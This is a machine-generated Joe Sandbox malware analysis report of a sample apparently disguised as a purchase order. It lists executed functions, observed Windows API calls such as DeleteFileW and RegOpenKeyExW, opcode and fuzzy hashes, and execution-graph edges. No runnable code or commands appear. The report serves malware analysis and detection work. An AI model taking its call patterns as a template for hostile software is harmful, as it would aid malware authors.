                                                  control_flow_graph 164 2d457e4-2d46ca1 CreateActCtxA 167 2d46ca3-2d46ca9 164->167 168 2d46caa-2d46d04 164->168 167->168 175 2d46d06-2d46d09 168->175 176 2d46d13-2d46d17 168->176 175->176 177 2d46d28 176->177 178 2d46d19-2d46d25 176->178 179 2d46d29 177->179 178->177 179->179
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02D46C91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6f614d5629e066c26baa23c356f9fc4a140cd6b796fb28ff98b775ac7b722838
                                                  • Instruction ID: 434d857e6ae5e9745167010ef3fcdfeb32b97715803b0c2a3c3f844b3ce0ff34
                                                  • Opcode Fuzzy Hash: 6f614d5629e066c26baa23c356f9fc4a140cd6b796fb28ff98b775ac7b722838
                                                  • Instruction Fuzzy Hash: E341D2B1C04618CBDB24CFA9C984B9EBBB5FF49308F108069D509AB354DB75A985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D46BD6 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 181 2d46bd6-2d46ca1 CreateActCtxA 183 2d46ca3-2d46ca9 181->183 184 2d46caa-2d46d04 181->184 183->184 191 2d46d06-2d46d09 184->191 192 2d46d13-2d46d17 184->192 191->192 193 2d46d28 192->193 194 2d46d19-2d46d25 192->194 195 2d46d29 193->195 194->193 195->195
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02D46C91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6ef70a94fd9c9b81d2d8632cf8fdb56a355e997afd5dce601177cc1cbdedfa7c
                                                  • Instruction ID: 98d86126a86b9d1b3706bb9949156cffc8429d4d24e4b1c2a64266a8b67d43c4
                                                  • Opcode Fuzzy Hash: 6ef70a94fd9c9b81d2d8632cf8fdb56a355e997afd5dce601177cc1cbdedfa7c
                                                  • Instruction Fuzzy Hash: B441D2B1C04618CFDB24CFA9D984BDEBBB5FF89308F208069D509AB254DB756985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4DED0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 197 2d4ded0-2d4df0c 198 2d4df12-2d4df17 197->198 199 2d4dfbc-2d4dfdc 197->199 200 2d4df19-2d4df50 198->200 201 2d4df6a-2d4dfa2 CallWindowProcW 198->201 205 2d4dfdf-2d4dfec 199->205 207 2d4df52-2d4df58 200->207 208 2d4df59-2d4df68 200->208 203 2d4dfa4-2d4dfaa 201->203 204 2d4dfab-2d4dfba 201->204 203->204 204->205 207->208 208->205
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D4DF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 7b8aace44f9ac45b4c7ef826b4c45e2aa4cf36b932a769a75da9af0fdc5c7f86
                                                  • Instruction ID: ae1efb9a26f9ae6267cdef57044b4606dba855f3ebef18d5edd786f874d80f65
                                                  • Opcode Fuzzy Hash: 7b8aace44f9ac45b4c7ef826b4c45e2aa4cf36b932a769a75da9af0fdc5c7f86
                                                  • Instruction Fuzzy Hash: 5D414AB4A00345CFCB14CF99C488B9ABBF6FF88314F258599E519AB361D774A845CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07AAA778 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 211 7aaa778-7aaa7e2 PostMessageW 212 7aaa7eb-7aaa7ff 211->212 213 7aaa7e4-7aaa7ea 211->213 213->212
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07AAA7D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 93f558d40d76b13f34c6a44b07e9ea2730aaa760ba946ddcc0449cb071baadbf
                                                  • Instruction ID: bea034601030e1a42dc71f1b17751d9b8c8c0b68641bf52e4161b77c2ad0d504
                                                  • Opcode Fuzzy Hash: 93f558d40d76b13f34c6a44b07e9ea2730aaa760ba946ddcc0449cb071baadbf
                                                  • Instruction Fuzzy Hash: 6411E5B5800349DFDB10CF99D884BDFBBF8EB48324F14881AE565A7600C375A584CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 07AA2C3F Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UUUU$f_%!
                                                  • API String ID: 0-131217998
                                                  • Opcode ID: 1a569f3fe2ef7596e18c6225ae817cc527643ded1fd6f78588652954d4e83a1c
                                                  • Instruction ID: 87025698aca2bc7dbf3bdfb3fae343a06a4b24292c0805d1a3e7f57963d15b7e
                                                  • Opcode Fuzzy Hash: 1a569f3fe2ef7596e18c6225ae817cc527643ded1fd6f78588652954d4e83a1c
                                                  • Instruction Fuzzy Hash: 42515D70E106299FDBA4CFA8C884B8DBBF2BF48314F5481A9D05CE7215DB749A89CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D44348 Relevance: .3, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4628f075d5a92ea57e4f61066b546588c7eee7a7859ccefafa82b924dd5051f0
                                                  • Instruction ID: 34b4be18ba3f1b777c3589a8af55c9f36fadf0dfc4f9bbb2cda48ef44e9befb2
                                                  • Opcode Fuzzy Hash: 4628f075d5a92ea57e4f61066b546588c7eee7a7859ccefafa82b924dd5051f0
                                                  • Instruction Fuzzy Hash: 1FC17675E006188FDB58CF6AC984AD9BBF2BF89304F14C1A9D409AB325DB315E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D440A9 Relevance: .2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a112e9cebbe854b4c4aa58df3a3998cc5dcc684f1faf41fdd770c23b9596c65f
                                                  • Instruction ID: d425d22887d16bbc7894dbfb2b8721b7144d72cbb1a17dffc877cee50cfb1e0d
                                                  • Opcode Fuzzy Hash: a112e9cebbe854b4c4aa58df3a3998cc5dcc684f1faf41fdd770c23b9596c65f
                                                  • Instruction Fuzzy Hash: C7617E74E04216CFDB58DFAAE540A9EBBF3BB88208F04C539C015AB768EF7059459B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D440B8 Relevance: .2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e6bfca5945a23237e0c103926e65dd59e3b9439fc5b8b0376cb05e1bb9c0c54
                                                  • Instruction ID: f52ccf2a08701540bb6f1834540586b9bed10e275148f2df22ac48464a3910f8
                                                  • Opcode Fuzzy Hash: 9e6bfca5945a23237e0c103926e65dd59e3b9439fc5b8b0376cb05e1bb9c0c54
                                                  • Instruction Fuzzy Hash: 9B616074E04216CFDB58DFAAE54079EBBF3BB88208F04C539C015AB768EF7059459B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07AA1910 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28bc2d4abbef4d178dda2c2a96c3f1a25c3db3333516a77baab9d1e46b31c2a1
                                                  • Instruction ID: 32a6289f25ed27e29009c0849a82901f29d528891c6ed0f84675fa479dd753e9
                                                  • Opcode Fuzzy Hash: 28bc2d4abbef4d178dda2c2a96c3f1a25c3db3333516a77baab9d1e46b31c2a1
                                                  • Instruction Fuzzy Hash: 0F4123B1E15A589BEB1CCF6BCC4168AFAF7AFC9301F14C1BA981CAB255EB3045458F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07AA1900 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e1aee160b324d557f38b200e47acd086d0666b537584e684c5bb9c12cb0095f
                                                  • Instruction ID: 5b53b7c58325ae2657e6cff9829e829109bed6d0c272d5ee7a1dcc22237c8f44
                                                  • Opcode Fuzzy Hash: 6e1aee160b324d557f38b200e47acd086d0666b537584e684c5bb9c12cb0095f
                                                  • Instruction Fuzzy Hash: 46414A71D14A589BEB1CCF6BDC4178BFAF7AFC9201F14C1BA985CAA255EB3005458F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:19.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:366
                                                  Total number of Limit Nodes:6
                                                  execution_graph 37548 fc0850 37549 fc085d 37548->37549 37553 5bf6048 37549->37553 37562 5bf6058 37549->37562 37550 fc086f 37555 5bf6057 37553->37555 37554 5bf61b2 37586 5bf6ad8 37554->37586 37591 5bf6ac8 37554->37591 37571 5bf65da 37555->37571 37576 5bf6619 37555->37576 37581 5bf6438 37555->37581 37556 5bf61be 37556->37550 37563 5bf6079 37562->37563 37568 5bf65da DeleteFileW 37563->37568 37569 5bf6619 DeleteFileW 37563->37569 37570 5bf6438 DeleteFileW 37563->37570 37564 5bf61b2 37566 5bf6ad8 66 API calls 37564->37566 37567 5bf6ac8 66 API calls 37564->37567 37565 5bf61be 37565->37550 37566->37565 37567->37565 37568->37564 37569->37564 37570->37564 37573 5bf65e1 37571->37573 37572 5bf673e 37572->37554 37596 5bf6758 37573->37596 37601 5bf6748 37573->37601 37578 5bf6620 37576->37578 37577 5bf673e 37577->37554 37579 5bf6758 DeleteFileW 37578->37579 37580 5bf6748 DeleteFileW 37578->37580 37579->37577 37580->37577 37582 5bf673e 37581->37582 37583 5bf646c 37581->37583 37582->37554 37583->37582 37584 5bf6758 DeleteFileW 37583->37584 37585 5bf6748 DeleteFileW 37583->37585 37584->37582 37585->37582 37588 5bf6ae1 37586->37588 37587 5bf6bd1 37587->37556 37588->37587 37609 5bf6be8 37588->37609 37653 5bf6bd8 37588->37653 37592 5bf6ae1 37591->37592 37593 5bf6bd1 37592->37593 37594 5bf6be8 66 API calls 37592->37594 37595 5bf6bd8 66 API calls 37592->37595 37593->37556 37594->37592 37595->37592 37597 5bf6789 37596->37597 37598 5bf6766 37596->37598 37599 5bf67ae 37597->37599 37605 5bf5d0c 37597->37605 37598->37572 37599->37572 37602 5bf6758 37601->37602 37603 5bf6766 37602->37603 37604 5bf5d0c DeleteFileW 37602->37604 37603->37572 37604->37603 37606 5bf6928 DeleteFileW 37605->37606 37608 5bf69a7 37606->37608 37608->37599 37610 5bf6c07 37609->37610 37611 5bf6c2f 37610->37611 37697 5bf8179 37610->37697 37701 5bf7b01 37610->37701 37707 5bf7e82 37610->37707 37713 5bf8209 37610->37713 37717 5bf7b8b 37610->37717 37723 5bf7f0c 37610->37723 37729 5bf828d 37610->37729 37733 5bf8311 37610->37733 37737 5bf8011 37610->37737 37741 5bf7c15 37610->37741 37747 5bf7f99 37610->37747 37751 5bf7c9f 37610->37751 37757 5bf83a1 37610->37757 37761 5bf80a1 37610->37761 37765 5bf79a8 37610->37765 37776 5bf7d29 37610->37776 37782 5bf8131 37610->37782 37786 5bf7a32 37610->37786 37797 5bf7db3 37610->37797 37803 5bf7abc 37610->37803 37809 5bf7e3d 37610->37809 37815 5bf81c1 37610->37815 37819 5bf7942 37610->37819 37830 5bf7b46 37610->37830 37836 5bf7ec7 37610->37836 37842 5bf82c9 37610->37842 37846 5bf7bd0 37610->37846 37852 5bf7f51 37610->37852 37856 5bf8251 37610->37856 37860 5bf7fd5 37610->37860 37864 5bf8359 37610->37864 37868 5bf8059 37610->37868 37872 5bf7c5a 37610->37872 37878 5bf83dd 37610->37878 37882 5bf7963 37610->37882 37893 5bf7ce4 37610->37893 37899 5bf80e9 37610->37899 37903 5bf79ed 37610->37903 37914 5bf7d6e 37610->37914 37920 5bf7a77 37610->37920 37929 5bf7df8 37610->37929 37654 5bf6be8 37653->37654 37655 5bf6c2f 37654->37655 37656 5bf7e3d 2 API calls 37654->37656 37657 5bf7abc 2 API calls 37654->37657 37658 5bf7db3 2 API calls 37654->37658 37659 5bf7a32 4 API calls 37654->37659 37660 5bf8131 KiUserExceptionDispatcher 37654->37660 37661 5bf7d29 2 API calls 37654->37661 37662 5bf79a8 4 API calls 37654->37662 37663 5bf80a1 KiUserExceptionDispatcher 37654->37663 37664 5bf83a1 KiUserExceptionDispatcher 37654->37664 37665 5bf7c9f 2 API calls 37654->37665 37666 5bf7f99 KiUserExceptionDispatcher 37654->37666 37667 5bf7c15 2 API calls 37654->37667 37668 5bf8011 KiUserExceptionDispatcher 37654->37668 37669 5bf8311 KiUserExceptionDispatcher 37654->37669 37670 5bf828d KiUserExceptionDispatcher 37654->37670 37671 5bf7f0c 2 API calls 37654->37671 37672 5bf7b8b 2 API calls 37654->37672 37673 5bf8209 KiUserExceptionDispatcher 37654->37673 37674 5bf7e82 2 API calls 37654->37674 37675 5bf7b01 2 API calls 37654->37675 37676 5bf8179 KiUserExceptionDispatcher 37654->37676 37677 5bf7df8 2 API calls 37654->37677 37678 5bf7a77 4 API calls 37654->37678 37679 5bf7d6e 2 API calls 37654->37679 37680 5bf79ed 4 API calls 37654->37680 37681 5bf80e9 KiUserExceptionDispatcher 37654->37681 37682 5bf7ce4 2 API calls 37654->37682 37683 5bf7963 4 API calls 37654->37683 37684 5bf83dd KiUserExceptionDispatcher 37654->37684 37685 5bf7c5a 2 API calls 37654->37685 37686 5bf8059 KiUserExceptionDispatcher 37654->37686 37687 5bf8359 KiUserExceptionDispatcher 37654->37687 37688 5bf7fd5 KiUserExceptionDispatcher 37654->37688 37689 5bf8251 KiUserExceptionDispatcher 37654->37689 37690 5bf7f51 KiUserExceptionDispatcher 37654->37690 37691 5bf7bd0 2 API calls 37654->37691 37692 5bf82c9 KiUserExceptionDispatcher 37654->37692 37693 5bf7ec7 2 API calls 37654->37693 37694 5bf7b46 2 API calls 37654->37694 37695 5bf7942 4 API calls 37654->37695 37696 5bf81c1 KiUserExceptionDispatcher 37654->37696 37656->37655 37657->37655 37658->37655 37659->37655 37660->37655 37661->37655 37662->37655 37663->37655 37664->37655 37665->37655 37666->37655 37667->37655 37668->37655 37669->37655 37670->37655 37671->37655 37672->37655 37673->37655 37674->37655 37675->37655 37676->37655 37677->37655 37678->37655 37679->37655 37680->37655 37681->37655 37682->37655 37683->37655 37684->37655 37685->37655 37686->37655 37687->37655 37688->37655 37689->37655 37690->37655 37691->37655 37692->37655 37693->37655 37694->37655 37695->37655 37696->37655 37698 5bf818a 37697->37698 37699 5bf8404 KiUserExceptionDispatcher 37698->37699 37700 5bf8420 37699->37700 37700->37611 37702 5bf7b12 37701->37702 37703 5bf7f30 KiUserExceptionDispatcher 37702->37703 37704 5bf7f4f KiUserExceptionDispatcher 37703->37704 37706 5bf8420 37704->37706 37706->37611 37708 5bf7e93 37707->37708 37709 5bf7f30 KiUserExceptionDispatcher 37708->37709 37710 5bf7f4f KiUserExceptionDispatcher 37709->37710 37712 5bf8420 37710->37712 37712->37611 37714 5bf821a 37713->37714 37715 5bf8404 KiUserExceptionDispatcher 37714->37715 37716 5bf8420 37715->37716 37716->37611 37718 5bf7b9c 37717->37718 37719 5bf7f30 KiUserExceptionDispatcher 37718->37719 37720 5bf7f4f KiUserExceptionDispatcher 37719->37720 37722 5bf8420 37720->37722 37722->37611 37724 5bf7f1d 37723->37724 37725 5bf7f30 KiUserExceptionDispatcher 37724->37725 37726 5bf7f4f KiUserExceptionDispatcher 37725->37726 37728 5bf8420 37726->37728 37728->37611 37730 5bf829e 37729->37730 37731 5bf8404 KiUserExceptionDispatcher 37730->37731 37732 5bf8420 37731->37732 37732->37611 37734 5bf8322 37733->37734 37735 5bf8404 KiUserExceptionDispatcher 37734->37735 37736 5bf8420 37735->37736 37736->37611 37738 5bf8022 37737->37738 37739 5bf8404 KiUserExceptionDispatcher 37738->37739 37740 5bf8420 37739->37740 37740->37611 37742 5bf7c26 37741->37742 37743 5bf7f30 KiUserExceptionDispatcher 37742->37743 37744 5bf7f4f KiUserExceptionDispatcher 37743->37744 37746 5bf8420 37744->37746 37746->37611 37748 5bf7faa 37747->37748 37749 5bf8404 KiUserExceptionDispatcher 37748->37749 37750 5bf8420 37749->37750 37750->37611 37752 5bf7cb0 37751->37752 37753 5bf7f30 KiUserExceptionDispatcher 37752->37753 37754 5bf7f4f KiUserExceptionDispatcher 37753->37754 37756 5bf8420 37754->37756 37756->37611 37758 5bf83b2 37757->37758 37759 5bf8404 KiUserExceptionDispatcher 37758->37759 37760 5bf8420 37759->37760 37760->37611 37762 5bf80b2 37761->37762 37763 5bf8404 KiUserExceptionDispatcher 37762->37763 37764 5bf8420 37763->37764 37764->37611 37766 5bf79b9 37765->37766 37767 5bf7a5c 37766->37767 37935 64b7a53 37766->37935 37774 64b7a53 2 API calls 37767->37774 37941 64b7ab0 37767->37941 37768 5bf7aa1 37769 5bf7f30 KiUserExceptionDispatcher 37768->37769 37770 5bf7f4f KiUserExceptionDispatcher 37769->37770 37772 5bf8420 37770->37772 37772->37611 37774->37768 37777 5bf7d3a 37776->37777 37778 5bf7f30 KiUserExceptionDispatcher 37777->37778 37779 5bf7f4f KiUserExceptionDispatcher 37778->37779 37781 5bf8420 37779->37781 37781->37611 37783 5bf8142 37782->37783 37784 5bf8404 KiUserExceptionDispatcher 37783->37784 37785 5bf8420 37784->37785 37785->37611 37787 5bf7a43 37786->37787 37788 5bf7a5c 37787->37788 37794 64b7a53 2 API calls 37787->37794 37795 64b7a53 2 API calls 37788->37795 37796 64b7ab0 2 API calls 37788->37796 37789 5bf7aa1 37790 5bf7f30 KiUserExceptionDispatcher 37789->37790 37791 5bf7f4f KiUserExceptionDispatcher 37790->37791 37793 5bf8420 37791->37793 37793->37611 37794->37788 37795->37789 37796->37789 37798 5bf7dc4 37797->37798 37799 5bf7f30 KiUserExceptionDispatcher 37798->37799 37800 5bf7f4f KiUserExceptionDispatcher 37799->37800 37802 5bf8420 37800->37802 37802->37611 37804 5bf7acd 37803->37804 37805 5bf7f30 KiUserExceptionDispatcher 37804->37805 37806 5bf7f4f KiUserExceptionDispatcher 37805->37806 37808 5bf8420 37806->37808 37808->37611 37810 5bf7e4e 37809->37810 37811 5bf7f30 KiUserExceptionDispatcher 37810->37811 37812 5bf7f4f KiUserExceptionDispatcher 37811->37812 37814 5bf8420 37812->37814 37814->37611 37816 5bf81d2 37815->37816 37817 5bf8404 KiUserExceptionDispatcher 37816->37817 37818 5bf8420 37817->37818 37818->37611 37820 5bf7948 37819->37820 37821 5bf7a5c 37820->37821 37827 64b7a53 2 API calls 37820->37827 37828 64b7a53 2 API calls 37821->37828 37829 64b7ab0 2 API calls 37821->37829 37822 5bf7aa1 37823 5bf7f30 KiUserExceptionDispatcher 37822->37823 37824 5bf7f4f KiUserExceptionDispatcher 37823->37824 37826 5bf8420 37824->37826 37826->37611 37827->37821 37828->37822 37829->37822 37831 5bf7b57 37830->37831 37832 5bf7f30 KiUserExceptionDispatcher 37831->37832 37833 5bf7f4f KiUserExceptionDispatcher 37832->37833 37835 5bf8420 37833->37835 37835->37611 37837 5bf7ed8 37836->37837 37838 5bf7f30 KiUserExceptionDispatcher 37837->37838 37839 5bf7f4f KiUserExceptionDispatcher 37838->37839 37841 5bf8420 37839->37841 37841->37611 37843 5bf82da 37842->37843 37844 5bf8404 KiUserExceptionDispatcher 37843->37844 37845 5bf8420 37844->37845 37845->37611 37847 5bf7be1 37846->37847 37848 5bf7f30 KiUserExceptionDispatcher 37847->37848 37849 5bf7f4f KiUserExceptionDispatcher 37848->37849 37851 5bf8420 37849->37851 37851->37611 37853 5bf7f62 37852->37853 37854 5bf8404 KiUserExceptionDispatcher 37853->37854 37855 5bf8420 37854->37855 37855->37611 37857 5bf8262 37856->37857 37858 5bf8404 KiUserExceptionDispatcher 37857->37858 37859 5bf8420 37858->37859 37859->37611 37861 5bf7fe6 37860->37861 37862 5bf8404 KiUserExceptionDispatcher 37861->37862 37863 5bf8420 37862->37863 37863->37611 37865 5bf836a 37864->37865 37866 5bf8404 KiUserExceptionDispatcher 37865->37866 37867 5bf8420 37866->37867 37867->37611 37869 5bf806a 37868->37869 37870 5bf8404 KiUserExceptionDispatcher 37869->37870 37871 5bf8420 37870->37871 37871->37611 37873 5bf7c6b 37872->37873 37874 5bf7f30 KiUserExceptionDispatcher 37873->37874 37875 5bf7f4f KiUserExceptionDispatcher 37874->37875 37877 5bf8420 37875->37877 37877->37611 37879 5bf83ee 37878->37879 37880 5bf8404 KiUserExceptionDispatcher 37879->37880 37881 5bf8420 37880->37881 37881->37611 37883 5bf7974 37882->37883 37884 5bf7a5c 37883->37884 37890 64b7a53 2 API calls 37883->37890 37891 64b7a53 2 API calls 37884->37891 37892 64b7ab0 2 API calls 37884->37892 37885 5bf7aa1 37886 5bf7f30 KiUserExceptionDispatcher 37885->37886 37887 5bf7f4f KiUserExceptionDispatcher 37886->37887 37889 5bf8420 37887->37889 37889->37611 37890->37884 37891->37885 37892->37885 37894 5bf7cf5 37893->37894 37895 5bf7f30 KiUserExceptionDispatcher 37894->37895 37896 5bf7f4f KiUserExceptionDispatcher 37895->37896 37898 5bf8420 37896->37898 37898->37611 37900 5bf80fa 37899->37900 37901 5bf8404 KiUserExceptionDispatcher 37900->37901 37902 5bf8420 37901->37902 37902->37611 37904 5bf79fe 37903->37904 37905 5bf7a5c 37904->37905 37911 64b7a53 2 API calls 37904->37911 37912 64b7a53 2 API calls 37905->37912 37913 64b7ab0 2 API calls 37905->37913 37906 5bf7aa1 37907 5bf7f30 KiUserExceptionDispatcher 37906->37907 37908 5bf7f4f KiUserExceptionDispatcher 37907->37908 37910 5bf8420 37908->37910 37910->37611 37911->37905 37912->37906 37913->37906 37915 5bf7d7f 37914->37915 37916 5bf7f30 KiUserExceptionDispatcher 37915->37916 37917 5bf7f4f KiUserExceptionDispatcher 37916->37917 37919 5bf8420 37917->37919 37919->37611 37921 5bf7a88 37920->37921 37927 64b7a53 2 API calls 37921->37927 37928 64b7ab0 2 API calls 37921->37928 37922 5bf7aa1 37923 5bf7f30 KiUserExceptionDispatcher 37922->37923 37924 5bf7f4f KiUserExceptionDispatcher 37923->37924 37926 5bf8420 37924->37926 37926->37611 37927->37922 37928->37922 37930 5bf7e09 37929->37930 37931 5bf7f30 KiUserExceptionDispatcher 37930->37931 37932 5bf7f4f KiUserExceptionDispatcher 37931->37932 37934 5bf8420 37932->37934 37934->37611 37936 64b7a0b 37935->37936 37940 64b7a5e 37935->37940 37936->37767 37937 64b7a71 37937->37767 37939 64b6820 RegQueryValueExW 37939->37940 37940->37937 37940->37939 37946 64b6814 37940->37946 37945 64b7acf 37941->37945 37942 64b7d39 37942->37768 37943 64b6814 RegOpenKeyExW 37943->37945 37944 64b6820 RegQueryValueExW 37944->37945 37945->37942 37945->37943 37945->37944 37947 64b7dc8 RegOpenKeyExW 37946->37947 37949 64b7e8e 37947->37949 37949->37949 37950 fcadd0 37951 fcadee 37950->37951 37954 fc9dc0 37951->37954 37953 fcae25 37956 fcc8f0 LoadLibraryA 37954->37956 37957 fcc9cc 37956->37957 37958 fc4540 37959 fc4554 37958->37959 37962 fc478a 37959->37962 37960 fc455d 37963 fc4793 37962->37963 37968 fc496c 37962->37968 37973 fc4870 37962->37973 37978 fc4986 37962->37978 37983 fc485f 37962->37983 37963->37960 37969 fc491f 37968->37969 37970 fc49ab 37969->37970 37988 fc4c78 37969->37988 37993 fc4c67 37969->37993 37974 fc48b4 37973->37974 37975 fc49ab 37974->37975 37976 fc4c78 2 API calls 37974->37976 37977 fc4c67 2 API calls 37974->37977 37976->37975 37977->37975 37979 fc4999 37978->37979 37980 fc49ab 37978->37980 37981 fc4c78 2 API calls 37979->37981 37982 fc4c67 2 API calls 37979->37982 37981->37980 37982->37980 37984 fc4870 37983->37984 37985 fc49ab 37984->37985 37986 fc4c78 2 API calls 37984->37986 37987 fc4c67 2 API calls 37984->37987 37986->37985 37987->37985 37989 fc4c86 37988->37989 37998 fc4cc8 37989->37998 38002 fc4cbb 37989->38002 37990 fc4c96 37990->37970 37994 fc4c86 37993->37994 37996 fc4cc8 RtlEncodePointer 37994->37996 37997 fc4cbb RtlEncodePointer 37994->37997 37995 fc4c96 37995->37970 37996->37995 37997->37995 37999 fc4d02 37998->37999 38000 fc4d2c RtlEncodePointer 37999->38000 38001 fc4d55 37999->38001 38000->38001 38001->37990 38003 fc4d02 38002->38003 38004 fc4d2c RtlEncodePointer 38003->38004 38005 fc4d55 38003->38005 38004->38005 38005->37990

                                                  Executed Functions

                                                  Function 05BF7963 Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
